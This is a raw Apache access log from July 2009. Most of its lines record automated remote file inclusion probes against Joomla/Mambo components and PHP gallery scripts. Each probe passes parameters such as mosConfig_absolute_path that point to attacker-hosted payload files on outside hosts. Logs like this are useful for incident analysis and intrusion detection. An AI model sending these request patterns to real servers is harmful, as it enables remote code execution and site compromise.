84.207.17.120 - - [12/Jul/2009:00:12:37 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:12:37 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:12:43 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:12:43 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:12:44 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:13:18 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:13:19 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:13:46 -0400] "GET /logs/access_log.Q109061500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:00:13:49 -0400] "GET //appserv/errors.php?error=http://articlecentralstation.com/idmantebscan.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
84.207.17.120 - - [12/Jul/2009:00:13:54 -0400] "GET /logs/access_log.Q109061500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:13:59 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:13:59 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:13:59 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:14:09 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:00:14:25 -0400] "GET /logs/error_log.Q107081600 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.30.80 - - [12/Jul/2009:00:15:07 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:15:07 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:15:07 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:15:11 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:15:28 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:15:28 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:15:28 -0400] "GET /logs/access_log.Q109052300/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:15:28 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:15:28 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:15:28 -0400] "GET /logs/access_log.Q109052300/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:00:15:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.191.102.117 - - [12/Jul/2009:00:17:09 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:17:09 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:17:09 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:17:10 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:17:11 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:17:11 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:17:11 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:17:11 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:00:17:14 -0400] "GET /logs/access_log.Q109051300//e404.php?INCLUDE_FOLDER=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:17:18 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:17:18 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:17:32 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.55.179.121 - - [12/Jul/2009:00:17:46 -0400] "GET /logs/access_log.Q109051300//e404.php?INCLUDE_FOLDER=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:17:53 -0400] "GET /logs/access_log.Q109052000%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:17:56 -0400] "GET /logs/access_log.Q109052000%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:17:58 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:17:58 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:17:58 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:17:59 -0400] "GET /logs/access_log.Q109052900%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:18:01 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:18:23 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:18:23 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:18:23 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:18:25 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:18:37 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:18:58 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.114.133.139 - - [12/Jul/2009:00:18:59 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:19:02 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.114.133.139 - - [12/Jul/2009:00:19:10 -0400] "GET /logs/access_log.Q109062100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:19:11 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:19:11 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:00:20:17 -0400] "GET /logs/access_log.Q109062700/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:00:20:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
147.123.157.1 - - [12/Jul/2009:00:20:45 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:56 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:56 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:56 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:56 -0400] "GET /logs/access_log.Q109063000%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:57 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:57 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:57 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:20:57 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:00:21:04 -0400] "GET /logs/access_log.Q109062100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:08 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:08 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:08 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:19 -0400] "GET /logs/error_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:22 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:23 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:24 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:24 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:24 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:24 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:21:29 -0400] "GET /logs/error_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:40 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:40 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:40 -0400] "GET /logs/access_log.Q109063000%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:40 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:41 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:41 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:41 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:42 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:43 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:43 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:43 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:43 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:45 -0400] "GET /logs/access_log.Q109063000%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:45 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:45 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:45 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:51 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:51 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:51 -0400] "GET /logs/access_log.Q109051600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:51 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:51 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:51 -0400] "GET /logs/access_log.Q109051600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:52 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:52 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:52 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:52 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:52 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:21:52 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:56 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:57 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:21:57 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:22:01 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:22:04 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
